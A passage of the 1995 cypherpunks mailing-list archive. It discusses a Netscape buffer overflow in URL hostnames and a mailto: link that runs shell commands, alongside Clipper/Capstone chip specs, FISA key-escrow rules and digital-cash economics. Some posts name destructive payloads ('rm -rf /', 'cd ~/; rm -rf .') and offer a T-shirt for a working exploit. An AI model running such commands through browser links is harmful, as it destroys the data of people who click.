Alpha (OSF/1 2.0) Hewlett-Packard 700-series (HP-UX 9.03) IBM RS/6000 AIX 3.2 Silicon Graphics (IRIX 5.2) Sun SPARC (Solaris 2.4, SunOS 4.1.3) 386/486/Pentium (BSDI) ) Or maybe it is just a missing item in the list ? [i hope!] dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept Saddam Hussein Qaddafi [Hello to all my fans in domestic surveillance] genetic Cocaine radar Ortega From dl at hplyot.obspm.fr Fri Sep 22 03:15:46 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Fri, 22 Sep 95 03:15:46 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509220612.CAA11441@clark.net> Message-ID: <9509221014.AA18627@hplyot.obspm.fr> Ray Cromwell writes: > > I've found a Netscape bug which I suspect is a buffer overflow and > may have the potential for serious damage. If it is an overflow bug, > then it may be possible to infect every computer which accesses a web > page with Netscape. To see the bug, create an html file containing > the following: [...] The sortest host length I've found to cause seg fault is 356 (yes, and not 256, 256+100 if you prefer :)) You can have a look at http://hplyot.obspm.fr/~dl/netscapesec/ for a 'demo' (click to crash) dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept Legion of Doom SEAL Team 6 Cocaine class struggle AK-47 jihad fissionable From futplex at pseudonym.com Fri Sep 22 03:38:00 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 22 Sep 95 03:38:00 PDT Subject: Project: a standard cell random number generator In-Reply-To: <9509202150.AA08164@toad.com> Message-ID: <9509221037.AA08096@cs.umass.edu> John Gilmore writes: > In this sense, NSA ought to be *encouraging* Intel and > IBM and Motorola to put "generate random bits" instructions into > their instruction sets... Does Tessera include any form of hardware RNG ? -Futplex From futplex at pseudonym.com Fri Sep 22 03:43:58 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 22 Sep 95 03:43:58 PDT Subject: RNG Resource FAQ (was Re: "random" number seeds vs. Netscape) In-Reply-To: <30609562.15FB@netscape.com> Message-ID: <9509221043.AA08133@cs.umass.edu> Perry Metzger writes: # You might want to read RFC 1750, Phil Karlton writes: > Did that. It talks about a lot of the pitfalls. Unfortunately it does not > address (nor can it realistically be expected to address) details of what > to look for on a particular version of an OS running on some particular > platform. Can someone point me to a compilation of such information ? If not, I'm definitely interested in starting a Web page to chronicle recommendations about good, bad, and questionable random and pseudo-random sources for specific architectures and operating systems. (It could also include information on special-purpose plug-in hardware RNGs.) -Futplex From jim at acm.org Fri Sep 22 04:10:47 1995 From: jim at acm.org (Jim Gillogly) Date: Fri, 22 Sep 95 04:10:47 PDT Subject: Project: a standard cell random number generator In-Reply-To: <9509221037.AA08096@cs.umass.edu> Message-ID: <199509221110.EAA03110@mycroft.rand.org> > futplex at pseudonym.com (Futplex) writes: > John Gilmore writes: > > In this sense, NSA ought to be *encouraging* Intel and > > IBM and Motorola to put "generate random bits" instructions into > > their instruction sets... > Does Tessera include any form of hardware RNG ? Yes. Here's a released CAPSTONE spec sheet. I don't expect an attack like the one on Netscape to work there. Jim Gillogly Sterday, 1 Winterfilth S.R. 1995, 11:07 ------- Forwarded Message Date: Fri, 30 Apr 93 10:11:03 EDT From: Clipper Chip Announcement Organization: National Institute of Standards and Technology (NIST) Posted-Date: Fri, 30 Apr 93 10:11:03 EDT Subject: Capstone Chip technology information CAPSTONE CHIP TECHNOLOGY CAPSTONE is an NSA developed, hardware oriented, cryptographic device that implements the same cryptographic algorithm as the CLIPPER chip. In addition, the CAPSTONE chip includes the following functions: 1. The Digital Signature Algorithm (DSA) proposed by NIST as a Federal Information Processing Standard (FIPS); 2. The Secure Hashing Algorithm (SHA) recently approved as FIPS 180; 3. A Key Exchange Algorithm based on a public key exchange; 4. A general purpose exponentiation algorithm; 5. A general purpose, random number generator which uses a pure noise source. The Key exchange Algorithm is programmable on the chip and uses functions 1-2 and 4-5 above. Prototypes of the CAPSTONE chip are due the last week in April. The chips are expected to sell for $85.00 each (programmed). The first CAPSTONE chips are to be installed in PCMCIA electronic boards and used for the PMSP program for the security of the Defense Messaging System. The CAPSTONE chip is big, complex and powerful. Over 850 megabytes are required by the automated design system to define the functions of the chip. VLSI Technology is fabricating the chip, and MYKOTRONX is designing and testing the chip. 1. What are the power requirements of the CAPSTONE chip? Will they fit the power requirements of battery-operated, hand held devices? The CAPSTONE chip requires a 5 volt DC voltage source. Power ratings are currently estimated at 3.5 milliamps per MHz, i.e. at 10 Mhz and 5 volt DC, power consumed is 175 milliwatts. These estimates will be refined as data are taken into the actual chips. In comparison, the CLIPPER chip consumes approximately 150 milliwatts at 5 volts DC and 10 MHz. As you can see, both chips fall within the power requirements of hand held, battery-operated devices. 2. Will the CAPSTONE chip incorporate the key escrow features of the CLIPPER chip? Yes, it will. 3. When will CAPSTONE be announced and available? Prototypes of the CAPSTONE chip are due the end of this month. We ask that you contact the manufacturer, Mykotronx Inc., for further information concerning the timetable for availability of CAPSTONE. 4. Is the Department of Defense working now to incorporate CAPSTONE in the Pre-message Security Protocol? Yes 5. Will CAPSTONE meet the design requirements of a PCMCIA card that combines voice and/or data communications with encryption capabilities? Yes 6. Will CAPSTONE use the Digital Signature Standard? What kind of key management scheme will be employed in the CAPSTONE chip? Will CAPSTONE allow the use of RSA public-key encryption in conjunction with, or as an alternative to, the DSS? If RSA is implemented on the CAPSTONE chip, will the key escrow feature function? CAPSTONE implements the Digital Signature Algorithm (DSA), proposed by NIST as a Federal Information Processing Standard (FIPS), to perform the digital signature functions. Key management is handled by an algorithm based on a public- key exchange technique. The CAPSTONE chip does not implement RSA. 4/30/93 ------- End of Forwarded Message From rah at shipwright.com Fri Sep 22 05:03:52 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 22 Sep 95 05:03:52 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft Message-ID: Historical example time... >(0) Alice invents a snaffleblort. Some Other Guy invented telephone >(1) Bob invents a snaffleblort. A.G. Bell invented telephone. >(2) Bob files for a patent on a snaffleblort. A.G. Bell files 6 hours earlier. Actually happened. We know what happened... ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From perry at piermont.com Fri Sep 22 05:25:00 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 22 Sep 95 05:25:00 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509220612.CAA11441@clark.net> Message-ID: <199509221224.IAA03734@frankenstein.piermont.com> Ray; This is evidence that, as I said, they have plenty of buffer overflow bugs. So much for the protestations to the contrary. My suspicion is that if you used a customized HTTPd that allowed you to shove arbitrary data into your URL, you could get the victim's copy of netscape to fandango on the stack and do nicely arbitrary things to the victim -- like executing "cd ~/; rm -rf ." A "Hack Netscape" T-Shirt for the first person (Ray, here is your chance!) to find an exploit using this! Though your demo shouldn't do anything bad. Does everyone think Ray should get a shirt no matter what? Perry Ray Cromwell writes: > > I've found a Netscape bug which I suspect is a buffer overflow and > may have the potential for serious damage. If it is an overflow bug, > then it may be possible to infect every computer which accesses a web > page with Netscape. To see the bug, create an html file containing > the following: > > a buffer size of 256 characters is good enough to hold any domain" > > It's definately the domain that's causing it, and not the length of > the URL or the data after the domain name. > > I also tried to overflow some netscape servers using similar techniques > (and shell metacharacters in all sorts of URLs), to no avail. I suspect > a similar attack may work against the Netscape Server if it is proxying. > > > Does anyone have a disassembly of Netscape, or more specifically, > a disassembly of the URL parse and domain lookup routines? I'd be > happy to collaborate and "Hack Netscape" ;-) > > > Happy Hacking, > -Ray > > > > > From perry at piermont.com Fri Sep 22 05:27:02 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 22 Sep 95 05:27:02 PDT Subject: Netscape bug update In-Reply-To: <199509220626.CAB16453@clark.net> Message-ID: <199509221226.IAA03742@frankenstein.piermont.com> I've decided that I'll pay Sameer for the shirt for Ray, regardless. However, if someone else produces the exploit first, they should get one, too! .pm Ray Cromwell writes: > > I just verified in GDB using a stack trace that the Netscape overflow > bug I mentioned is indeed a static stack buffer overflow. It trashes > the stack. > > What this means is that in theory, it is possible to get a simple > URL, if clicked on, to execute some code on someone's browser. > > Now the hard work begins... > > > Happy Hacking, > -Ray > > From nsb at nsb.fv.com Fri Sep 22 05:29:28 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Fri, 22 Sep 95 05:29:28 PDT Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping) In-Reply-To: <199509220137.LAA12354@sweeney.cs.monash.edu.au> Message-ID: Excerpts from mail.fv: 22-Sep-95 Re: first virtual "security.. Jiri Baum at sweeney.cs.mon (1560*) > > >financial insecurity never was a problem as > > >long as it remains under a small %. > > > > This is an amazing statement, Laurent. > It's not an amazing statement. As long as the cost of insecurity is > less than cost of security, there's no problem. I think the basic confusion here is precisely about the cost. The cost of having one credit card stolen is small. The cost of having millions stolen at once is *astronomical*. It really could bring down the whole credit card system, if that was the criminal's goal. My concern is about schemes in which the compromise of the cryptographic algorithms or software leads to a scenario in which one criminal steals millions of credit cards. In such a scenario, the cost of insecurity is unacceptably high. > Okay, so what's stopping you from starting right now with PGP? > You could simply have that as an alternative to the current system > (on a per-ID basis, ie new customers specify PGP or not). > Quite a few people both have PGP and would think well of you if you > started using it. > How about "The safest Internet payment system just got safer."? We're definitely moving in this direction. It's more complicated than you make it sound, though. Personally, I don't want to use any cryptography without an explicit, clear, policy and mechanism for key expiration and key lifetimes. The risk of key compromise is directly proportional to the key lifetime. PGP today -- which we use very heavily internal to FV -- is not well-equipped for dealing with key management issues on a scale of millions of users. Now, having said that... we're currently planning to deploy FV version 2 before the end of the year. Version 2 *will* include the first use of PGP in the FV system, but it will NOT work the way you probably expect. Stay tuned! -- Nathaniel -------- Nathaniel S. Borenstein | When privacy is outlawed, Chief Scientist, First Virtual Holdings | only outlaws will have privacy! FAQ & PGP key: nsb+faq at nsb.fv.com | SUPPORT THE ZIMMERMANN DEFENSE FUND! ---VIRTUAL YELLOW RIBBON-->> zldf at clark.net From bianco at itribe.net Fri Sep 22 05:30:10 1995 From: bianco at itribe.net (David J. Bianco) Date: Fri, 22 Sep 95 05:30:10 PDT Subject: Netscape bug update In-Reply-To: <199509220626.CAB16453@clark.net> Message-ID: <199509221227.IAA22985@gatekeeper.itribe.net> On Sep 22, 2:26, Ray Cromwell sent the following to the NSA's mail archives: > Subject: Netscape bug update || || I just verified in GDB using a stack trace that the Netscape overflow || bug I mentioned is indeed a static stack buffer overflow. It trashes || the stack. || || What this means is that in theory, it is possible to get a simple || URL, if clicked on, to execute some code on someone's browser. || || Now the hard work begins... || This is a new feature of Netscape 2.0, part of the Java package I believe... ;-) -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From nobody at REPLAY.COM Fri Sep 22 05:30:42 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 22 Sep 95 05:30:42 PDT Subject: Project: a standard cell random number generator Message-ID: <199509221230.OAA06528@utopia.hacktic.nl> These supplement JG's post on CAPSTONE -- which is itself available with related crypto papers at csrc.ncsl.gov: ------------------ URL: http://csrc.ncsl.nist.gov/nistgen/clip.txt CLIPPER CHIP TECHNOLOGY CLIPPER is an NSA developed, hardware oriented, cryptographic device that implements a symmetric encryption/decryption algorithm and a law enforcement satisfying key escrow system. While the escrow management system design is not completely designed, the cryptographic algorithm (SKIPJACK) is completely specified (and classified SECRET). The cryptographic algorithm (called CA in this paper) has the following characteristics: 1. Symmetric, 80-bit key encryption/decryption algorithm; 2. Similar in function to DES (i.e., basically a 64-bit code book transformation that can be used in the same four modes of operation as specified for DES in FIPS 81); 3. 32 rounds of processing per single encrypt/decrypt operation; 4. Design started by NSA in 1985; evaluation completed in 1990. The CLIPPER CHIP is just one implementation of the CA. The CLIPPER CHIP designed for the AT&T commercial secure voice products has the following characteristics: 1. Functions specified by NSA; logic designed by MYKOTRONX; chip fabricated by VLSI, Inc.: manufactured chip programmed (made unique) by MYKOTRONX to security equipment manufacturers willing to follow proper security procedures for handling and storage of the programmed chip; equipment sold to customers; 2. Resistant to reverse engineering against a very sophisticated, well funded adversary; 3. 15-20 MB/S encryption/decryption constant throughout once cryptographic synchronization is established with distant CLIPPER Chip; 4. The chip programming equipment writes (one time) the following information into a special memory (called VROM or VIA-Link) on the chip: a. (unique) serial number b. (unique) unit key c. family key d. specialized control software 5. Upon generation (or entry) of a session key in the chip, the chip performs the following actions: a. Encrypts the 80-bit session key under the unit key producing an 80-bit intermediate result; b. Concatenates the 80-bit result with the 25-bit serial number and a 23-bit authentication pattern (total of 128 bits); c. Enciphers this 128 bits with family key to produce a 128-bit cipher block chain called the Law Enforcement Field (LEF); d. Transmits the LEF at least once to the intended receiving CLIPPER chip; e. The two communicating CLIPPER chips use this field together with a random IV to establish Cryptographic Synchronization. 6. Once synchronized, the CLIPPER chips use the session key to encrypt/decrypt data in both directions; 7. The chips can be programmed to not enter secure mode if the LEF field has been tampered with (e.g., modified, superencrypted, replaced); 8. CLIPPER chips will be available from a second source in the future; 9. CLIPPER chips will be modified and upgraded in the future; 10. CLIPPER chips presently cost $16.00 (unprogrammed) and $26.00 (programmed). 4/30/93 ------------------- URL: http://csrc.ncsl.nist.gov/nistnews/esc_key2.txt February 4, 1994 AUTHORIZATION PROCEDURES FOR RELEASE OF ENCRYPTION KEY COMPONENTS IN CONJUNCTION WITH INTERCEPTS PURSUANT TO FISA The following are the procedures for the release of escrowed key components in conjunction with lawfully authorized interception of communications encrypted with a key-escrow encryption method. These procedures cover all electronic surveillance conducted pursuant to the Foreign Intelligence Surveillance Act (FISA), Pub. L. 95-511, which appears at Title 50, U.S. Code, Section 1801 et seq. 1) In each case there shall be a legal authorization for the interception of wire and/or electronic communications. 2) In the event that federal authorities discover during the course of any lawfully authorized interception that communications encrypted with a key-escrow encryption method are being utilized, they may obtain a certification from an agency authorized to participate in the conduct of the interception, or from the Attorney General of the United States or designee thereof. Such certification shall (a) identify the agency participating in the conduct of the interception and the person providing the certification; (b) certify that necessary legal authorization has been obtained to conduct electronic surveillance regarding these communications; (c) specify the termination date of the period for which interception has been authorized; (d) identify by docket number or other suitable method of specification the source of the authorization; (e) certify that communications covered by that authorization are being encrypted with a key-escrow encryption method; (f) specify the identifier (ID) number of the key-escrow encryption chip providing such encryption; and (g) specify the serial (ID) number of the key-escrow decryption device that will be used by the agency participating in the conduct of the interception for decryption of the intercepted communications. 4) This certification shall be submitted to each of the designated key component escrow agents. If the certification has been provided by an agency authorized to participate in the conduct of the interception, a copy shall be provided to the Department of Justice, Office of Intelligence Policy and Review. As soon as possible, an attorney associated with that office shall provide each of the key component escrow agents with written confirmation of the certification. 5) Upon receiving the certification, each key component escrow agent shall release the necessary key component to the agency participating in the conduct of the interception. The key components shall be provided in a manner that assures they cannot be used other than in conjunction with the lawfully authorized electronic surveillance for which they were requested. 6) Each of the key component escrow agents shall retain a copy of the certification, as well as the subsequent written confirmation of the Department of Justice, Office of Intelligence Policy and Review. 7) Upon, or prior to, completion of the electronic surveillance phase of the investigation, the ability of the agency participating in the conduct of the interception to decrypt intercepted communications shall terminate, and such agency may not retain the key components. 8) The Department of Justice shall, in each such case, (a) ascertain the existence of authorizations for electronic surveillance in cases for which escrowed key components have been released; (b) ascertain that key components for a particular key-escrow encryption chip are being used only by an agency authorized to participate in the conduct of the interception of communications encrypted with that chip; and (c) ascertain that, no later than the completion of the electronic surveillance phase of the investigation, the ability of the agency participating in the conduct of the interception to decrypt intercepted communications is terminated. 9) Reports to the House Permanent Select Committee on Intelligence and the Senate Select Committee on Intelligence, pursuant to Section 108 of FISA, shall, with respect to any order for authorized electronic surveillance for which escrowed encryption components were released and used for decryption, specifically note that fact. These procedures do not create, and are not intended to create, any substantive rights for individuals intercepted through electronic surveillance, and noncompliance with these procedures shall not provide the basis for any motion to suppress or other objection to the introduction of electronic surveillance evidence lawfully acquired. ------------------ From perry at piermont.com Fri Sep 22 05:36:15 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 22 Sep 95 05:36:15 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509220715.DAA27920@clark.net> Message-ID: <199509221236.IAA03762@frankenstein.piermont.com> Ray Cromwell writes: > THIS IS A SERIOUS BUG! [...] > [I hear Perry in the background groaning and muttering "I told you so"] Of course I told you so. I knew what I was saying when I mentioned buffer overflows being a big problem in code written by the NCSA team, most of whom went over to Netscape When at NCSA, they showed very little capacity to learn this lesson no matter how many cracks occured. They always just tried to kludge around the thing instead of fixing it. When I write security oriented code, I outright ban the use of certain C library calls. > These buffer overflow bugs should be taught in every programming > 101 course along with fencepost errors. > > I'm not even sure if I want to write the obligatory program to exploit > the hack given that some malicious jerk would probably use it > on his home page to attack people. The problem is that if you don't produce a (benign) exploit people aren't going to take it seriously enough. Perry From perry at piermont.com Fri Sep 22 05:43:45 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 22 Sep 95 05:43:45 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <43tpv8$rom@tera.mcom.com> Message-ID: <199509221243.IAA03781@frankenstein.piermont.com> Jeff Weinstein writes: > OK, Perry was right, and it was wrong of me to argue with him based > only on the code that I have personally seen. As we have already > determined, I have not reviewed every line of code in netscape. > > Not that I want to divert attention away from netscape(OK, maybe I > do :-) ), but does this bug exist in any other common browser? Probably in Mosaic, though not necessarily in the same place. Its a case of the same programmers making the same mistakes over and over again. I don't believe the Sun Java stuff would suffer from it, although I fear Java a great deal. Perry From perry at piermont.com Fri Sep 22 05:48:01 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 22 Sep 95 05:48:01 PDT Subject: YET ANOTHER BAD NETSCAPE HOLE! In-Reply-To: <199509220830.EAA13828@clark.net> Message-ID: <199509221247.IAA03798@frankenstein.piermont.com> Its hardly suprising to me. Look at the link list on any dynamically linked version of netscape and you'll see lots of calls that look very suspicious. I keep telling people this sort of thing and no one at Netscape listens, although I believe that we may have made a couple of converts in the firm now. Perry Ray Cromwell writes: > > > > On the bright side, mailto: hyperlinks containing extra-long domain names > > seem to be handled comparatively safely in both Netscape and Mosaic. > > (Perhaps they just have longer buffers ? ;) > > Good question. My guess is, Netscape doesn't do any processing on the > mailto: hyperlink at all, but merely passes it to a real mail delivery > agent like Sendmail (or it uses MAPI under Win'95). Which begs > the question, if Netscape is executing an external delivery agent, > there may be the possiblity of sneaking an attack in there and getting > the shell to execute something. > > Hmm, let me try something. > > > WOW!! Unbelievable! Stop the presses! I Can't believe no one ever discovered > this before! Try a page with the following URL > > test > > Muahaha! Yet another security hole! Clicking on this mailto brings up > an xterm on my machine! Simply change the xterm& to "rm -rf /" and > bingo! > > > Sheesh. I better stop before I am on Netscape's most hated list. > > > -Ray > > From perry at piermont.com Fri Sep 22 05:57:45 1995 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 22 Sep 95 05:57:45 PDT Subject: Project: a standard cell random number generator In-Reply-To: <199509221110.EAA03110@mycroft.rand.org> Message-ID: <199509221257.IAA03853@frankenstein.piermont.com> Jim Gillogly writes: > > futplex at pseudonym.com (Futplex) writes: > > Does Tessera include any form of hardware RNG ? > > Yes. Here's a released CAPSTONE spec sheet. That probably means that this sort of thing *can* be made cost effective on ordinary chips. Now we have to get Tim to lobby Intel to put RNGs on the P7 chip :-) Perry From rah at shipwright.com Fri Sep 22 06:23:41 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 22 Sep 95 06:23:41 PDT Subject: e$: Non-Repudiation Message-ID: Dr. May said: >the >"ontology" of digital money, the instruments and forms it can take, are >_impoverished_ compared to the real world. Ah... Someone's playing my song... Sorry I took so long, but I wanted to give this excellent post some serious attention, which is hard to come by when you're a person like me (praise the lord and pass the Ritalin ;-) ). >In my eight years of following digital cash work, I've been struck with how >little _economics_ enters the fray. I think you're right, Tim. More and more people are finally realizing that digital commerce *is* cryptography: cryptography as it's applied to economics on a network of microprocessors. After all, Netscape plans to make its money on servers, most important, its commerce servers, the servers that require the most cryptography. A major leader on this front, to my mind -- that is, someone who has been barking on the end of his chain ;-) the longest and loudest about all this, and who has gone out and *learned* how the clearing of transactions happens in the capital markets and elsewhere -- is Eric Hughes. Eric, who, along with Tim May, founded this group to begin with, who has worked with David Chaum, and who designed and built the first anonymous remailers. One of the reasons we don't see much of Eric around here these days is because he's out there putting some rubber to the road in his consulting business, where he's focusing on the very issue of cryptography and its applications to digital commerce, and I wish him well. That is *not* to slight others in this group who are also thinking about this stuff. Not at all. In addition, most of us are looking at other issues in cryptography, like remailers, like keeping the state out of our face, like pithing SSL, and, frankly, most of the rest of us are too busy making a living to do anything but lurk here. Cryptography is huge, and digital commerce is a small conceptual subset of the whole field, no matter how important some of us think it is. Nonetheless, the fact that both of the founders of this group are focusing on cryptographic financial objects and/or their network infrastructure speaks volumes its importance anyway. Having laid down that as covering fire ;-), let's talk about creating an ecosystem of autonomous financial objects on public networks, and why I think that Tim's post is particularly important. The reason we have the multiplicity of financial instruments out there to begin with is because there is money in creating them. But the reason there's money in it is because of the fall of the price of networked computer-based communication. The market they're traded in exists in computers. The decisions made to buy and sell them are at least facilitated by computers. The clearing and settlement of these instruments are done on computers. However, these systems are all centralized, closed, private systems. For that reason, the very accelleration of processing cost-effectiveness which created them is going to sweep them away someday. The bleeding edge of all this is the so-called 'synthetic' security, something which exists as a software manifestation of the most recent financial theory, sometimes only experimental and a few hours old, sometimes sold to an investment bank's clients just like any other security, secondary markets and all. A combination of purchases and short sales of put and call options on a particular bond, which behaves like the bond in price, for example, without having to hold the bond itself. This is usually done because the liquidity or the transaction cost of holding these instruments is lower than that of the bond. In addition, since unwinding of the synthetic security should yield the price of the bond after transaction costs, any discrepancies between the two yields an opportunity for arbitrage. Of course, in the early days, all of 10 years ago, theory held somewhat more promise than reality. The great "portfolio insurance" fiasco of the early 80's arose from the fact that the options trades which were supposed to offset the fall of the price of a security in this fashion turned out to be not very liquid after all. When the time came to unwind these positions in a hurry, they got stuck. That's not as much of a problem these days, as evidenced by the proliferation of increasingly sophisticated securities based on the same idea, which trade and settle just fine, Note that we're talking about book-entry entities here. That is, these modern securities are creatures of an environment where software "applications" reside on a particular computer on a particular local or private network, to manipulate centralized accounting entries on that computer or elsewhere, in order to reflect the expected or traded value of a security. Things that live "on" a computer. It's controlled completely from the outside, with the exception of the behavior of the market. Not "in" it, or "in" the network the computer's hooked into. Notice how different all that is from a digital certificate like Chaumian digital cash. When you get a digital certificate, you receive it through a cryptographic protocol which ensures that it is what it says it is. If the certificate is traded on-line, then the certificate's issuer vouches for it right then and there. If it is traded off-line (someday, I hope...) the certificate speaks for itself, just like a dollar bill's supposed to. As such, it can reside anywhere, not as a book-entry "on" a central computer somewhere, but "in" the network. Notice also we are backing down a level of abstraction from the status quo. A certificate is what it says it is, it is not book-entry, which is a pointer to something which is what it says it is. That's the paradox of modern book entry systems. A book entry used to just "point" to a physical certificate, which in turn points to a cash-flow or a series of cash-flows of some kind. Of course, the term "book entry" is almost exclusively used to describe clearing capital market trades without the physical exchange of certificates for other pieces of paper (receipts, checks, signature guarantees, etc.). The institutional ideal in this environment is a clearing-house wire clearing the trade in exchange for a bank wire transfer settling the trade. The book entry becomes the primary abstraction, not any certificate it is supposed to represent. The problem with book entries, of course, is the problem with any database. You have to manipulate that database, and to do that, you have to get access, and to do that you need permission... you get the point. In a capital market, that costs money, and it's costing more and more as a percentage of the revenue derived from the transaction, because to get access, you need human permission and intervention. If a human isn't supervising things, people take advantage of their access. Mr. Leeson of Barings was a classic case in point. Meanwhile, Moore's law keeps lowering the cost of the rest of the production cycle. Another problem, closer to the heart of this list, is that of anonymity. The ultimate authority to modify that particular line item or database field derives from the "owner" of that entry, since it is usually modified by someone else, "a chain of custody" is needed: audit trails, and of course, True Names are necessary somewhere, even with numbered accounts. The primary point for inventing double-entry bookeeping was so owners could control accountants, after all. When electronic book entries started replacing paper ones, the resulting economies of scale caused great centralization to occur. As I've said here before, lines were cheaper than nodes, and things got bigger and bigger. The advent of the microprocessor has been continually eating away at these large control hierarchies, and making them harder and harder to maintain. Things are getting out of control again. In an out of control environment, like that found on public uncontrolled networks like the internet, software has to be autonomous. A certificate, like a piece of digital cash, is an autonomous entity. As we said before, it is what it says it is. Because of a cryptographic protocol, you trust the thing because of the way it behaves, not because you trust the people who gave you access to it. Now, Tim is talking about another type of autonomous entity, an agent, basically, a "friendly" virus. A piece of code which is launched or launches itself on one machine, crosses a network, runs itself on another machine, and returns with a result. Our current concept of software agents implies that there's something on another machine needs to be "got", usually a database requiring access and permissions, which is why people who manage centralized repositories of information are nervous about them, just like microcomputers made their mainframe predecessors nervous. On the other hand, it's easy to see a scenario where two agents arrange to meet somewhere on a *public* network, in the presence of another "impartial" agent to exchange certificates, trading, settling and clearing all in one shot. Unsupervised. Out of control. Because the agents are engaging in a cryptographic process which "breaks" if the entities behave improperly, fraud is supposed to be prevented. Which brings me to something which goes right to the heart of one of our most cherished ideas here on cypherpunks, the idea of crypto-anarchy: with the right cryptography, agreements become uninforceable because perfect anonymity disconnects the "pointers" between digital and physical identity. Crypto-anarchy means that states don't know who to force to do what. Technology does this, it's reality, it's not optional, so we better get used to it. The catch to all of this is a curious conceptual double negative called non-repudiation. I had trouble remembering the name for a while, I kept wanting to say "plausible deniability", in the spirit of Admiral Poindexter. But I've had to remember the real name, because the idea's so damned important. Right now, the canon of commercial law for the entire free world (just so I can't be accused of quibbling here :-) ) is completely based on the concept of non-repudiation, that is, you can't repudiate an agreement, or a trade, or you or you face legal sanction. Force, in other words. Ultimately, the state can send you to jail, or worse. About a year ago, when www-buyinfo had active discussion on it, (and had not yet been turned into cyphe$rpunks by my reflexive redirection there of all the e$ cheezy-bits from cypherpunks ;-), ) I got into an interesting discussion there about non-repudiation and I didn't even know I was involved in one. We were arguing about a familiar dichotomy in the concept of digital cash, the difference between on-line and off-line protocols. I was arguing that on-line cash was better because it was a more "peer-to-peer" proposition than an online system, which required access to a network connection, and high-bandwidth processing at the certificate issuer so the issuer could participate in *every* *single* *cash* *settlement*. That invasive participation struck me as antithetical to the whole concept of a hyper-distributed geodesic economy that I thought that digital commerce was going to become. The technology which made it possible for anyone, anywhere, to sell anything digitable -- music, movies, information, teleoperator control sequences, professional services, and financial instruments -- to anyone else, while using the cheapest possible transaction protocol, that is, cash, a protocol which immediately and finally clears and settles a transaction, will win out in the end. So, I was finding myself twisting in the wind about all of this, trying to figure out how offline cash was going to have to work if double-spending was possible, how could be kept to managable levels. I found myself saying things like (forgive me), "Well, if they double-spend, put 'em in the airlo- er, throw 'em in jail!". In other words, we have the key of the double spender, even if she's anonymous, so we could use snitches, subpoenas of bank records, and plain old detective work, to send her to jail should she repudiate the agreement to not double-spend. It's hard to see how that would happen in a perfect world with perfect anonymity, much less in a world where nation-states couldn't collect income to pay for judges, courts, and LEAs. Nick Szabo was gleefully slapping me around the head and shoulders about this, and I retired from the field. So, no matter how much the idea refuses to leave my thick Frisian head, I'll leave that big, red, dog ("Hey, baby...") sleeping on the front porch for the time being. This without even *touching* the other problem with digital cash in general, Nathaniel Borenstein's favorite anti-digital-cash 2-by-4 -- which threatens *all* digital cash systems on- or off- line -- the prospect of someone *inside* a certificate issuer stealing the private key for an entire issue, and printing all the money she wants. To that I say, use multiple issues, and distribute keys, but I see that big red dog's waking up, so we'll move on... So, you can see we're talking about the alleged inability of cryptography to deal with the repudiation of digital cash trades. It cannot currently keep transactions either the way cypherpunks want, utterly anonymous, and the way I want them, off-line. In fact, at the moment, I'm very close to holding the strong form of this argument, that is, the concept of non-repudiation is the *only* reason we're being forced into true-name trades right now. It's not the long arm of the law, it's the market, which makes sense. If it was just a legal obstacle, and really contrary to market forces, it should have collapsed under a barrage regulatory arbitrage attempts. No threat of legal force would have prevented people from trying to make money issuing digital cash. The War on Some Drugs is a good example of this. If we could get digital cash trades, or trades of any kind of financial instrument for that matter, to trade on public networks without the ability to repudiate them, it probably won't matter whether they're illegal, which is interesting, to say the least, but it's no different from what happens with paper certificates. Now, as usual, all this is no brilliant insight on my part. A few days ago, I didn't know what "non-repudiation" meant. On Wednesday, I had a very interesting over-coffee conversation with Yet Another Professional Who Wants To Remain Anonymous. I must be a magnet to these people for some reason, at least until they figure out I'm not *that* useful. Or maybe because it's because I need so much help. Anyway, people who were on cypherpunks last summer remember my previous anonymous legal informant, the esteemed councellor Vinnie "The Pro" Bono, not to be confused with his second cousin, the Honorable Sonny. "Vinnie" wanted to remain anonymous because he was afraid of being deluged with requests for free legal advice, among other things. I still won't tell you who he was, but he has since "come out", and, of course, we *aren't* choking his POP server with requests to get our various relations out of the slammer, or anything else for that matter, even though he talks freely here under his True Name. I expect my new friend will figure this out soon enough. The other reason he gave is that he's so damn busy he doesn't have time to do much but lurk. Unfortunately, this guy lurks not here, but on www-buyinfo, having signed on to cypherpunks and deciding *not* to drink from a firehose, thank you very much, and since I've been spamming it lately with the aforementioned cypherpunks e$ cheezy bits, he seems to prefer it there. I have to admit myself that as much as *I* like it here, it is an acquired taste... Now, our friend Vinnie has very some serious credentials, but this new guy is just plain scary because he's so focused on the commercial law of EDI and electronic commerce. This hypercredentialed gentleman shows up on the program committee of various "suit" conferences on electronic commerce, sponsored by various international legal entities and 